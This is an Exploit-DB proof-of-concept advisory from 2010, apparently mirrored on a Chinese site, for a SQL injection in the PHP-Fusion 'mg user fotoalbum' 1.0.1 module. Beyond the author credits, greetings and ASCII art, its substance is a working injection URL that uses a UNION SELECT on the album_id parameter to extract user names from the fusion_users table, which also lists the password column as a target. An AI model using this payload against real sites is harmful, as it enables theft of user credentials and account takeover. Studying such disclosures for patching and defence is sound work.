PHP-Fusion Mod Mg User Fotoalbum 1.0.1 – SQL Injection

  • 作者: Easy Laster
    日期: 2010-10-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15227/
  • ----------------------------Information------------------------------------------------
+Name : PHP-Fusion mg user fotoalbum 1.0.1 <=SQL injection Vulnerability Proof of Concept
+Autor : Easy Laster
+Date : 10.10.2010
+Script: PHP-Fusion mg user fotoalbum 1.0.1
+Download : http://phpfusion.marcusg.de/downloads.php?page_id=67
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
 
---------------------------------------------------------------------------------------

 ___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_
|_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_| 
|___| |___| 
 
 
----------------------------------------------------------------------------------------
+Proof of Concept
+Table : fusion_users
+columns : user_password, user_name
+Proof of Concept : http://www.site.com/infusions/mg_user_fotoalbum_panel/mg_user_fot
oalbum.php?album_user_id=251&album_id=%27+union+select+1,2,3,4,user_name,6,7,8,9,10,11
+from+fusion_users+where+user_id=1--+
----------------------------------------------------------------------------------------